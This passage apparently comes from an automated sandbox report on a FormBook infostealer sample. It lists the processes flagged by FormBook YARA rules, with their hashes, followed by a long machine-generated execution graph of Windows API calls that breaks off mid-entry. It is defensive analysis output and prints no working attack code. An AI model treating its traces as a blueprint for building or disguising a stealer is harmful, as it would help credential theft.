                                                                                              Commandline:"C:\Windows\SysWOW64\find.exe"
                                                                                              Imagebase:0x120000
                                                                                              File size:14'848 bytes
                                                                                              MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:7
                                                                                              Start time:23:27:58
                                                                                              Start date:07/10/2024
                                                                                              Path:C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe"
                                                                                              Imagebase:0xce0000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:23:28:11
                                                                                              Start date:07/10/2024
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                              Imagebase:0x7ff6bf500000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:3.1%
                                                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                                                Signature Coverage:3.4%
                                                                                                Total number of Nodes:1610
                                                                                                Total number of Limit Nodes:37
                                                                                                execution_graph 83128 4444e4 83133 40d900 83128->83133 83130 4444ee 83137 43723d 83130->83137 83132 444504 83134 40d917 83133->83134 83135 40d909 83133->83135 83134->83135 83136 40d91c CloseHandle 83134->83136 83135->83130 83136->83130 83138 40d900 CloseHandle 83137->83138 83139 437247 ctype 83138->83139 83139->83132 83140 4161c2 83141 4161d3 83140->83141 83175 41aa31 HeapCreate 83141->83175 83144 416212 83177 416e29 GetModuleHandleW 83144->83177 83149 416223 __RTC_Initialize 83211 41b669 83149->83211 83151 416231 83152 41623d GetCommandLineW 83151->83152 83280 4117af 67 API calls 3 library calls 83151->83280 83226 42235f GetEnvironmentStringsW 83152->83226 83155 41624c 83232 4222b1 GetModuleFileNameW 83155->83232 83156 41623c 83156->83152 83158 416256 83159 416261 83158->83159 83281 4117af 67 API calls 3 library calls 83158->83281 83236 422082 83159->83236 83163 416272 83249 41186e 83163->83249 83166 416279 83168 416284 __wwincmdln 83166->83168 83283 4117af 67 API calls 3 library calls 83166->83283 83255 40d7f0 83168->83255 83171 4162b3 83285 411a4b 67 API calls _doexit 83171->83285 83174 4162b8 _flsall 83176 416206 83175->83176 83176->83144 83278 41616a 67 API calls 3 library calls 83176->83278 83178 416e44 83177->83178 83179 416e3d 83177->83179 83181 416fac 83178->83181 83182 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 83178->83182 83286 41177f Sleep GetModuleHandleW 83179->83286 83316 416ad5 70 API calls 2 library calls 83181->83316 83184 416e97 TlsAlloc 83182->83184 83183 416e43 83183->83178 83187 416218 83184->83187 83188 416ee5 TlsSetValue 83184->83188 83187->83149 83279 41616a 67 API calls 3 library calls 83187->83279 83188->83187 83189 416ef6 83188->83189 83287 411a69 6 API calls 3 library calls 83189->83287 83191 416efb 83288 41696e TlsGetValue 83191->83288 83194 41696e __encode_pointer 6 API calls 83195 416f16 83194->83195 83196 41696e __encode_pointer 6 API calls 83195->83196 83197 416f26 83196->83197 83198 41696e __encode_pointer 6 API calls 83197->83198 83199 416f36 83198->83199 83298 41828b InitializeCriticalSectionAndSpinCount __getstream 83199->83298 83201 416f43 83201->83181 83299 4169e9 TlsGetValue 83201->83299 83206 4169e9 __decode_pointer 6 API calls 83207 416f8a 83206->83207 83207->83181 83208 416f91 83207->83208 83315 416b12 67 API calls 5 library calls 83208->83315 83210 416f99 GetCurrentThreadId 83210->83187 83429 41718c 83211->83429 83213 41b675 GetStartupInfoA 83214 416ffb __calloc_crt 67 API calls 83213->83214 83221 41b696 83214->83221 83215 41b8b4 _flsall 83215->83151 83216 41b831 GetStdHandle 83220 41b7fb 83216->83220 83217 416ffb __calloc_crt 67 API calls 83217->83221 83218 41b896 SetHandleCount 83218->83215 83219 41b843 GetFileType 83219->83220 83220->83215 83220->83216 83220->83218 83220->83219 83431 4189e6 InitializeCriticalSectionAndSpinCount _flsall 83220->83431 83221->83215 83221->83217 83221->83220 83223 41b77e 83221->83223 83223->83215 83223->83220 83224 41b7a7 GetFileType 83223->83224 83430 4189e6 InitializeCriticalSectionAndSpinCount _flsall 83223->83430 83224->83223 83227 422370 83226->83227 83228 422374 83226->83228 83227->83155 83229 416fb6 __malloc_crt 67 API calls 83228->83229 83230 422395 _memcpy_s 83229->83230 83231 42239c FreeEnvironmentStringsW 83230->83231 83231->83155 83233 4222e6 _wparse_cmdline 83232->83233 83234 416fb6 __malloc_crt 67 API calls 83233->83234 83235 422329 _wparse_cmdline 83233->83235 83234->83235 83235->83158 83237 42209a _wcslen 83236->83237 83241 416267 83236->83241 83238 416ffb __calloc_crt 67 API calls 83237->83238 83244 4220be _wcslen 83238->83244 83239 422123 83240 413a88 ___wtomb_environ 67 API calls 83239->83240 83240->83241 83241->83163 83282 4117af 67 API calls 3 library calls 83241->83282 83242 416ffb __calloc_crt 67 API calls 83242->83244 83243 422149 83245 413a88 ___wtomb_environ 67 API calls 83243->83245 83244->83239 83244->83241 83244->83242 83244->83243 83247 422108 83244->83247 83432 426349 67 API calls __wcsicmp_l 83244->83432 83245->83241 83247->83244 83433 417d93 10 API calls 3 library calls 83247->83433 83250 41187c __IsNonwritableInCurrentImage 83249->83250 83434 418486 83250->83434 83252 41189a __initterm_e 83254 4118b9 __IsNonwritableInCurrentImage __initterm 83252->83254 83438 411421 83252->83438 83254->83166 83256 431bcb 83255->83256 83257 40d80c 83255->83257 83482 4092c0 83257->83482 83259 40d847 83486 40eb50 83259->83486 83262 40d877 83489 411ac6 67 API calls 4 library calls 83262->83489 83265 40d888 83490 411b24 67 API calls __wcsicmp_l 83265->83490 83267 40d891 83491 40f370 SystemParametersInfoW SystemParametersInfoW 83267->83491 83269 40d89f 83492 40d6d0 GetCurrentDirectoryW 83269->83492 83271 40d8a7 SystemParametersInfoW 83272 40d8d4 83271->83272 83273 40d8cd FreeLibrary 83271->83273 83274 4092c0 VariantClear 83272->83274 83273->83272 83275 40d8dd 83274->83275 83276 4092c0 VariantClear 83275->83276 83277 40d8e6 83276->83277 83277->83171 83284 411a1f 67 API calls _doexit 83277->83284 83278->83144 83279->83149 83280->83156 83281->83159 83282->83163 83283->83168 83284->83171 83285->83174 83286->83183 83287->83191 83289 4169a7 GetModuleHandleW 83288->83289 83290 416986 83288->83290 83291 4169c2 GetProcAddress 83289->83291 83292 4169b7 83289->83292 83290->83289 83293 416990 TlsGetValue 83290->83293 83296 41699f 83291->83296 83317 41177f Sleep GetModuleHandleW 83292->83317 83297 41699b 83293->83297 83295 4169bd 83295->83291 83295->83296 83296->83194 83297->83289 83297->83296 83298->83201 83300 416a01 83299->83300 83301 416a22 GetModuleHandleW 83299->83301 83300->83301 83302 416a0b TlsGetValue 83300->83302 83303 416a32 83301->83303 83304 416a3d GetProcAddress 83301->83304 83307 416a16 83302->83307 83318 41177f Sleep GetModuleHandleW 83303->83318 83306 416a1a 83304->83306 83306->83181 83309 416ffb 83306->83309 83307->83301 83307->83306 83308 416a38 83308->83304 83308->83306 83311 417004 83309->83311 83312 416f70 83311->83312 83313 417022 Sleep 83311->83313 83319 422452 83311->83319 83312->83181 83312->83206 83314 417037 83313->83314 83314->83311 83314->83312 83315->83210 83316->83187 83317->83295 83318->83308 83320 42245e _flsall 83319->83320 83321 422476 83320->83321 83331 422495 _memset 83320->83331 83332 417f23 67 API calls __getptd_noexit 83321->83332 83323 42247b 83333 417ebb 6 API calls 2 library calls 83323->83333 83325 422507 HeapAlloc 83325->83331 83328 42248b _flsall 83328->83311 83331->83325 83331->83328 83334 418407 83331->83334 83341 41a74c 5 API calls 2 library calls 83331->83341 83342 42254e LeaveCriticalSection _doexit 83331->83342 83343 411afc 6 API calls __decode_pointer 83331->83343 83332->83323 83335 41841c 83334->83335 83336 41842f EnterCriticalSection 83334->83336 83344 418344 83335->83344 83336->83331 83338 418422 83338->83336 83372 4117af 67 API calls 3 library calls 83338->83372 83340 41842e 83340->83336 83341->83331 83342->83331 83343->83331 83345 418350 _flsall 83344->83345 83346 418360 83345->83346 83347 418378 83345->83347 83373 418252 67 API calls 2 library calls 83346->83373 83355 418386 _flsall 83347->83355 83376 416fb6 83347->83376 83350 418365 83374 4180a7 67 API calls 7 library calls 83350->83374 83353 4183a7 83359 418407 __lock 67 API calls 83353->83359 83354 418398 83382 417f23 67 API calls __getptd_noexit 83354->83382 83355->83338 83356 41836c 83375 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83356->83375 83361 4183ae 83359->83361 83362 4183e2 83361->83362 83363 4183b6 83361->83363 83364 413a88 ___wtomb_environ 67 API calls 83362->83364 83383 4189e6 InitializeCriticalSectionAndSpinCount _flsall 83363->83383 83367 4183d3 83364->83367 83366 4183c1 83366->83367 83384 413a88 83366->83384 83398 4183fe LeaveCriticalSection _doexit 83367->83398 83370 4183cd 83397 417f23 67 API calls __getptd_noexit 83370->83397 83372->83340 83373->83350 83374->83356 83379 416fbf 83376->83379 83378 416ff5 83378->83353 83378->83354 83379->83378 83380 416fd6 Sleep 83379->83380 83399 4138ba 83379->83399 83381 416feb 83380->83381 83381->83378 83381->83379 83382->83355 83383->83366 83385 413a94 _flsall 83384->83385 83386 413ad3 83385->83386 83387 413b0d _flsall _realloc 83385->83387 83388 418407 __lock 65 API calls 83385->83388 83386->83387 83389 413ae8 RtlFreeHeap 83386->83389 83387->83370 83393 413aab ___sbh_find_block 83388->83393 83389->83387 83390 413afa 83389->83390 83428 417f23 67 API calls __getptd_noexit 83390->83428 83392 413aff GetLastError 83392->83387 83394 413ac5 83393->83394 83426 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __cftoe2_l 83393->83426 83427 413ade LeaveCriticalSection _doexit 83394->83427 83397->83367 83398->83355 83400 41396d 83399->83400 83411 4138cc 83399->83411 83424 411afc 6 API calls __decode_pointer 83400->83424 83402 413973 83425 417f23 67 API calls __getptd_noexit 83402->83425 83405 413965 83405->83379 83408 413929 RtlAllocateHeap 83408->83411 83409 4138dd 83409->83411 83417 418252 67 API calls 2 library calls 83409->83417 83418 4180a7 67 API calls 7 library calls 83409->83418 83419 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83409->83419 83411->83405 83411->83408 83411->83409 83412 413959 83411->83412 83415 41395e 83411->83415 83420 41386b 67 API calls 4 library calls 83411->83420 83421 411afc 6 API calls __decode_pointer 83411->83421 83422 417f23 67 API calls __getptd_noexit 83412->83422 83423 417f23 67 API calls __getptd_noexit 83415->83423 83417->83409 83418->83409 83420->83411 83421->83411 83422->83415 83423->83405 83424->83402 83425->83405 83426->83394 83427->83386 83428->83392 83429->83213 83430->83223 83431->83220 83432->83244 83433->83247 83436 41848c 83434->83436 83435 41696e __encode_pointer 6 API calls 83435->83436 83436->83435 83437 4184a4 83436->83437 83437->83252 83441 4113e5 83438->83441 83440 41142e 83440->83254 83442 4113f1 _flsall 83441->83442 83449 41181b 83442->83449 83448 411412 _flsall 83448->83440 83450 418407 __lock 67 API calls 83449->83450 83451 4113f6 83450->83451 83452 4112fa 83451->83452 83453 4169e9 __decode_pointer 6 API calls 83452->83453 83454 41130e 83453->83454 83455 4169e9 __decode_pointer 6 API calls 83454->83455 83456 41131e 83455->83456 83457 4113a1 83456->83457 83475 4170e7 68 API calls 5 library calls 83456->83475 83472 41141b 83457->83472 83459 41133c 83461 411357 83459->83461 83462 411366 83459->83462 83471 411388 83459->83471 83460 41696e __encode_pointer 6 API calls 83463 411396 83460->83463 83476 417047 73 API calls _realloc 83461->83476 83462->83457 83465 411360 83462->83465 83466 41696e __encode_pointer 6 API calls 83463->83466 83465->83462 83468 41137c 83465->83468 83477 417047 73 API calls _realloc 83465->83477 83466->83457 83470 41696e __encode_pointer 6 API calls 83468->83470 83469 411376 83469->83457 83469->83468 83470->83471 83471->83460 83478 411824 83472->83478 83475->83459 83476->83465 83477->83469 83481 41832d LeaveCriticalSection 83478->83481 83480 411420 83480->83448 83481->83480 83483 4092c8 ctype 83482->83483 83484 429db0 VariantClear 83483->83484 83485 4092d5 ctype 83483->83485 83484->83485 83485->83259 83530 40eb70 83486->83530 83489->83265 83490->83267 83491->83269 83534 401f80 83492->83534 83494 40d6f1 IsDebuggerPresent 83495 431a9d MessageBoxA 83494->83495 83496 40d6ff 83494->83496 83497 431ab6 83495->83497 83496->83497 83498 40d71f 83496->83498 83627 403e90 75 API calls 3 library calls 83497->83627 83604 40f3b0 83498->83604 83502 40d73a GetFullPathNameW 83624 401440 127 API calls _wcscat 83502->83624 83504 40d77a 83505 40d782 83504->83505 83506 431b09 SetCurrentDirectoryW 83504->83506 83507 40d78b 83505->83507 83628 43604b 6 API calls 83505->83628 83506->83505 83616 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 83507->83616 83510 431b28 83510->83507 83512 431b30 GetModuleFileNameW 83510->83512 83514 431ba4 GetForegroundWindow ShellExecuteW 83512->83514 83515 431b4c 83512->83515 83517 40d7c7 83514->83517 83629 401b70 83515->83629 83516 40d795 83523 40d7a8 83516->83523 83625 40e1e0 97 API calls _memset 83516->83625 83521 40d7d1 SetCurrentDirectoryW 83517->83521 83521->83271 83523->83517 83626 401000 Shell_NotifyIconW _memset 83523->83626 83524 431b66 83636 40d3b0 75 API calls 2 library calls 83524->83636 83527 431b72 GetForegroundWindow ShellExecuteW 83528 431b9f 83527->83528 83528->83517 83529 40eba0 LoadLibraryA GetProcAddress 83529->83262 83531 40d86e 83530->83531 83532 40eb76 LoadLibraryA 83530->83532 83531->83262 83531->83529 83532->83531 83533 40eb87 GetProcAddress 83532->83533 83533->83531 83637 40e680 75 API calls 83534->83637 83536 401f90 83638 402940 75 API calls __write_nolock 83536->83638 83538 401fa2 GetModuleFileNameW 83639 40ff90 83538->83639 83540 401fbd 83651 4107b0 75 API calls 83540->83651 83542 401fd6 83543 401b70 75 API calls 83542->83543 83544 401fe4 83543->83544 83652 4019e0 76 API calls 83544->83652 83546 401ff2 83547 4092c0 VariantClear 83546->83547 83548 402002 83547->83548 83549 401b70 75 API calls 83548->83549 83550 40201c 83549->83550 83653 4019e0 76 API calls 83550->83653 83552 40202c 83553 401b70 75 API calls 83552->83553 83554 40203c 83553->83554 83654 40c3e0 75 API calls 83554->83654 83556 40204d 83655 40c060 83556->83655 83560 40206e 83661 4115d0 79 API calls __wcsicmp_l 83560->83661 83562 40207d 83563 42c174 83562->83563 83564 402088 83562->83564 83672 401a70 75 API calls 83563->83672 83662 4115d0 79 API calls __wcsicmp_l 83564->83662 83567 42c189 83673 401a70 75 API calls 83567->83673 83568 402093 83568->83567 83569 40209e 83568->83569 83663 4115d0 79 API calls __wcsicmp_l 83569->83663 83572 42c1a7 83574 42c1b0 GetModuleFileNameW 83572->83574 83573 4020a9 83573->83574 83575 4020b4 83573->83575 83674 401a70 75 API calls 83574->83674 83664 4115d0 79 API calls __wcsicmp_l 83575->83664 83578 4020bf 83580 402107 83578->83580 83584 42c20a _wcscpy 83578->83584 83665 401a70 75 API calls 83578->83665 83579 42c1e2 83675 40df50 75 API calls 83579->83675 83583 402119 83580->83583 83580->83584 83582 42c1f1 83676 401a70 75 API calls 83582->83676 83587 42c243 83583->83587 83667 40e7e0 76 API calls 83583->83667 83677 401a70 75 API calls 83584->83677 83588 4020e5 _wcscpy 83666 401a70 75 API calls 83588->83666 83589 42c201 83589->83584 83592 402132 83668 40d030 76 API calls 83592->83668 83595 40213e 83596 4092c0 VariantClear 83595->83596 83597 402148 83596->83597 83600 402184 83597->83600 83669 40d030 76 API calls 83597->83669 83670 40e640 76 API calls 83597->83670 83671 401a70 75 API calls 83597->83671 83601 4092c0 VariantClear 83600->83601 83603 402196 ctype 83601->83603 83603->83494 83605 42ccf4 _memset 83604->83605 83606 40f3c9 83604->83606 83609 42cd05 GetOpenFileNameW 83605->83609 84353 40ffb0 76 API calls ctype 83606->84353 83608 40f3d2 84354 410130 SHGetMalloc 83608->84354 83609->83606 83611 40d732 83609->83611 83611->83502 83611->83504 83612 40f3d9 84359 410020 88 API calls __wcsicoll 83612->84359 83614 40f3e7 84360 40f400 83614->84360 83617 42b9d3 83616->83617 83618 41025a LoadImageW RegisterClassExW 83616->83618 84405 443e8f EnumResourceNamesW LoadImageW 83617->84405 84404 4102f0 7 API calls 83618->84404 83621 40d790 83623 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 83621->83623 83622 42b9da 83623->83516 83624->83504 83625->83523 83626->83517 83627->83504 83628->83510 83630 401b76 _wcslen 83629->83630 83631 41171a 75 API calls 83630->83631 83634 401bc5 83630->83634 83632 401bad _memcpy_s 83631->83632 83633 41171a 75 API calls 83632->83633 83633->83634 83635 40d3b0 75 API calls 2 library calls 83634->83635 83635->83524 83636->83527 83637->83536 83638->83538 83678 40f5e0 83639->83678 83641 40ffa6 83641->83540 83644 42b6d8 83645 42b6e6 83644->83645 83734 434fe1 83644->83734 83647 413a88 ___wtomb_environ 67 API calls 83645->83647 83648 42b6f5 83647->83648 83649 434fe1 106 API calls 83648->83649 83650 42b702 83649->83650 83650->83540 83651->83542 83652->83546 83653->83552 83654->83556 83656 41171a 75 API calls 83655->83656 83657 40c088 83656->83657 83658 41171a 75 API calls 83657->83658 83659 402061 83658->83659 83660 401a70 75 API calls 83659->83660 83660->83560 83661->83562 83662->83568 83663->83573 83664->83578 83665->83588 83666->83580 83667->83592 83668->83595 83669->83597 83670->83597 83671->83597 83672->83567 83673->83572 83674->83579 83675->83582 83676->83589 83677->83597 83738 40f580 83678->83738 83680 40f5f8 _strcat ctype 83746 40f6d0 83680->83746 83685 42b2ee 83775 4151b0 83685->83775 83687 40f679 83687->83685 83689 40f681 83687->83689 83762 414e94 83689->83762 83693 40f68b 83693->83641 83697 452574 83693->83697 83694 42b31d 83781 415484 83694->83781 83696 42b33d 83698 41557c _fseek 105 API calls 83697->83698 83699 4525df 83698->83699 84298 4523ce 83699->84298 83702 4525fc 83702->83644 83703 4151b0 __fread_nolock 81 API calls 83704 45261d 83703->83704 83705 4151b0 __fread_nolock 81 API calls 83704->83705 83706 45262e 83705->83706 83707 4151b0 __fread_nolock 81 API calls 83706->83707 83708 452649 83707->83708 83709 4151b0 __fread_nolock 81 API calls 83708->83709 83710 452666 83709->83710 83711 41557c _fseek 105 API calls 83710->83711 83712 452682 83711->83712 83713 4138ba _malloc 67 API calls 83712->83713 83714 45268e 83713->83714 83715 4138ba _malloc 67 API calls 83714->83715 83716 45269b 83715->83716 83717 4151b0 __fread_nolock 81 API calls 83716->83717 83718 4526ac 83717->83718 83719 44afdc GetSystemTimeAsFileTime 83718->83719 83720 4526bf 83719->83720 83721 4526d5 83720->83721 83722 4526fd 83720->83722 83723 413a88 ___wtomb_environ 67 API calls 83721->83723 83724 452704 83722->83724 83725 45275b 83722->83725 83727 4526df 83723->83727 84304 44b195 83724->84304 83726 413a88 ___wtomb_environ 67 API calls 83725->83726 83729 452759 83726->83729 83730 413a88 ___wtomb_environ 67 API calls 83727->83730 83729->83644 83733 4526e8 83730->83733 83731 452753 83732 413a88 ___wtomb_environ 67 API calls 83731->83732 83732->83729 83733->83644 83735 434ff1 83734->83735 83736 434feb 83734->83736 83735->83645 83737 414e94 __fcloseall 106 API calls 83736->83737 83737->83735 83739 429440 83738->83739 83740 40f589 _wcslen 83738->83740 83741 40f58f WideCharToMultiByte 83740->83741 83742 40f5d8 83741->83742 83743 40f5ad 83741->83743 83742->83680 83794 41171a 83743->83794 83747 40f6dd _strlen 83746->83747 83809 40f790 83747->83809 83750 414e06 83829 414d40 83750->83829 83752 40f666 83752->83685 83753 40f450 83752->83753 83756 40f45a _strcat _memcpy_s __write_nolock 83753->83756 83754 4151b0 __fread_nolock 81 API calls 83754->83756 83756->83754 83757 42936d 83756->83757 83761 40f531 83756->83761 83912 41557c 83756->83912 83758 41557c _fseek 105 API calls 83757->83758 83759 429394 83758->83759 83760 4151b0 __fread_nolock 81 API calls 83759->83760 83760->83761 83761->83687 83763 414ea0 _flsall 83762->83763 83764 414ed1 83763->83764 83765 414eb4 83763->83765 83767 415965 __lock_file 68 API calls 83764->83767 83771 414ec9 _flsall 83764->83771 84051 417f23 67 API calls __getptd_noexit 83765->84051 83769 414ee9 83767->83769 83768 414eb9 84052 417ebb 6 API calls 2 library calls 83768->84052 84035 414e1d 83769->84035 83771->83693 84120 41511a 83775->84120 83777 4151c8 83778 44afdc 83777->83778 84291 4431e0 83778->84291 83780 44affd 83780->83694 83782 415490 _flsall 83781->83782 83783 4154bb 83782->83783 83784 41549e 83782->83784 83785 415965 __lock_file 68 API calls 83783->83785 84295 417f23 67 API calls __getptd_noexit 83784->84295 83787 4154c3 83785->83787 83789 4152e7 __ftell_nolock 71 API calls 83787->83789 83788 4154a3 84296 417ebb 6 API calls 2 library calls 83788->84296 83791 4154cf 83789->83791 84297 4154e8 LeaveCriticalSection LeaveCriticalSection __wfsopen 83791->84297 83793 4154b3 _flsall 83793->83696 83796 411724 83794->83796 83795 4138ba _malloc 67 API calls 83795->83796 83796->83795 83797 40f5bb WideCharToMultiByte 83796->83797 83801 411740 std::bad_alloc::bad_alloc 83796->83801 83806 411afc 6 API calls __decode_pointer 83796->83806 83797->83680 83800 411770 83808 41805b RaiseException 83800->83808 83803 411421 __cinit 74 API calls 83801->83803 83805 411766 83801->83805 83803->83805 83804 41177e 83807 4116fd 67 API calls std::exception::exception 83805->83807 83806->83796 83807->83800 83808->83804 83810 40f7ae _memset 83809->83810 83811 42a349 83810->83811 83813 40f628 83810->83813 83814 415258 83810->83814 83813->83750 83815 415285 83814->83815 83816 415268 83814->83816 83815->83816 83817 41528c 83815->83817 83825 417f23 67 API calls __getptd_noexit 83816->83825 83827 41c551 103 API calls 14 library calls 83817->83827 83820 41526d 83826 417ebb 6 API calls 2 library calls 83820->83826 83821 4152b2 83823 41527d 83821->83823 83828 4191c9 101 API calls 6 library calls 83821->83828 83823->83810 83825->83820 83827->83821 83828->83823 83830 414d4c _flsall 83829->83830 83831 414d5f 83830->83831 83834 414d95 83830->83834 83881 417f23 67 API calls __getptd_noexit 83831->83881 83833 414d64 83882 417ebb 6 API calls 2 library calls 83833->83882 83848 41e28c 83834->83848 83837 414d9a 83838 414da1 83837->83838 83839 414dae 83837->83839 83883 417f23 67 API calls __getptd_noexit 83838->83883 83840 414dd6 83839->83840 83841 414db6 83839->83841 83866 41dfd8 83840->83866 83884 417f23 67 API calls __getptd_noexit 83841->83884 83845 414d74 _flsall @_EH4_CallFilterFunc@8 83845->83752 83849 41e298 _flsall 83848->83849 83850 418407 __lock 67 API calls 83849->83850 83851 41e2a6 83850->83851 83852 41e322 83851->83852 83858 418344 __mtinitlocknum 67 API calls 83851->83858 83863 41e31b 83851->83863 83889 4159a6 68 API calls __lock 83851->83889 83890 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 83851->83890 83854 416fb6 __malloc_crt 67 API calls 83852->83854 83855 41e32c 83854->83855 83855->83863 83891 4189e6 InitializeCriticalSectionAndSpinCount _flsall 83855->83891 83856 41e3b0 _flsall 83856->83837 83858->83851 83860 41e351 83861 41e35c 83860->83861 83862 41e36f EnterCriticalSection 83860->83862 83864 413a88 ___wtomb_environ 67 API calls 83861->83864 83862->83863 83886 41e3bb 83863->83886 83864->83863 83875 41dffb __wopenfile 83866->83875 83867 41e015 83896 417f23 67 API calls __getptd_noexit 83867->83896 83869 41e1e9 83869->83867 83872 41e247 83869->83872 83870 41e01a 83897 417ebb 6 API calls 2 library calls 83870->83897 83893 425db0 83872->83893 83875->83867 83875->83869 83898 4136bc 79 API calls 2 library calls 83875->83898 83877 41e1e2 83877->83869 83899 4136bc 79 API calls 2 library calls 83877->83899 83879 41e201 83879->83869 83900 4136bc 79 API calls 2 library calls 83879->83900 83881->83833 83883->83845 83884->83845 83885 414dfc LeaveCriticalSection LeaveCriticalSection __wfsopen 83885->83845 83892 41832d LeaveCriticalSection 83886->83892 83888 41e3c2 83888->83856 83889->83851 83890->83851 83891->83860 83892->83888 83901 425ce4 83893->83901 83895 414de1 83895->83885 83896->83870 83898->83877 83899->83879 83900->83869 83903 425cf0 _flsall 83901->83903 83902 425d03 83904 417f23 __wcsicmp_l 67 API calls 83902->83904 83903->83902 83906 425d41 83903->83906 83905 425d08 83904->83905 83907 417ebb __wcsicmp_l 6 API calls 83905->83907 83908 4255c4 __tsopen_nolock 132 API calls 83906->83908 83911 425d17 _flsall 83907->83911 83909 425d5b 83908->83909 83910 425d82 __sopen_helper LeaveCriticalSection 83909->83910 83910->83911 83911->83895 83916 415588 _flsall 83912->83916 83913 415596 83943 417f23 67 API calls __getptd_noexit 83913->83943 83915 4155c4 83925 415965 83915->83925 83916->83913 83916->83915 83917 41559b 83944 417ebb 6 API calls 2 library calls 83917->83944 83921 4155ab _flsall 83921->83756 83926 415977 83925->83926 83927 415999 EnterCriticalSection 83925->83927 83926->83927 83928 41597f 83926->83928 83930 4155cc 83927->83930 83929 418407 __lock 67 API calls 83928->83929 83929->83930 83931 4154f2 83930->83931 83932 415512 83931->83932 83933 415502 83931->83933 83935 415524 83932->83935 83946 4152e7 83932->83946 84000 417f23 67 API calls __getptd_noexit 83933->84000 83963 41486c 83935->83963 83936 415507 83945 4155f7 LeaveCriticalSection LeaveCriticalSection __wfsopen 83936->83945 83943->83917 83945->83921 83947 41531a 83946->83947 83948 4152fa 83946->83948 83949 41453a __fileno 67 API calls 83947->83949 84001 417f23 67 API calls __getptd_noexit 83948->84001 83951 415320 83949->83951 83954 41efd4 __locking 71 API calls 83951->83954 83952 4152ff 84002 417ebb 6 API calls 2 library calls 83952->84002 83955 415335 83954->83955 83956 4153a9 83955->83956 83958 415364 83955->83958 83962 41530f 83955->83962 84003 417f23 67 API calls __getptd_noexit 83956->84003 83959 41efd4 __locking 71 API calls 83958->83959 83958->83962 83960 415404 83959->83960 83961 41efd4 __locking 71 API calls 83960->83961 83960->83962 83961->83962 83962->83935 83964 414885 83963->83964 83968 4148a7 83963->83968 83965 41453a __fileno 67 API calls 83964->83965 83964->83968 83966 4148a0 83965->83966 84004 41c3cf 101 API calls 5 library calls 83966->84004 83969 41453a 83968->83969 83970 41455e 83969->83970 83971 414549 83969->83971 83975 41efd4 83970->83975 84005 417f23 67 API calls __getptd_noexit 83971->84005 83973 41454e 84006 417ebb 6 API calls 2 library calls 83973->84006 83976 41efe0 _flsall 83975->83976 83977 41f003 83976->83977 83978 41efe8 83976->83978 83979 41f011 83977->83979 83984 41f052 83977->83984 84027 417f36 67 API calls __getptd_noexit 83978->84027 84029 417f36 67 API calls __getptd_noexit 83979->84029 83982 41efed 84028 417f23 67 API calls __getptd_noexit 83982->84028 83983 41f016 84030 417f23 67 API calls __getptd_noexit 83983->84030 84007 41ba3b 83984->84007 83988 41eff5 _flsall 83988->83936 83989 41f01d 84031 417ebb 6 API calls 2 library calls 83989->84031 83990 41f058 83992 41f065 83990->83992 83993 41f07b 83990->83993 84017 41ef5f 83992->84017 84032 417f23 67 API calls __getptd_noexit 83993->84032 83996 41f080 84033 417f36 67 API calls __getptd_noexit 83996->84033 83997 41f073 84034 41f0a6 LeaveCriticalSection __unlock_fhandle 83997->84034 84000->83936 84001->83952 84003->83962 84004->83968 84005->83973 84008 41ba47 _flsall 84007->84008 84009 41baa2 84008->84009 84010 418407 __lock 67 API calls 84008->84010 84011 41bac4 _flsall 84009->84011 84012 41baa7 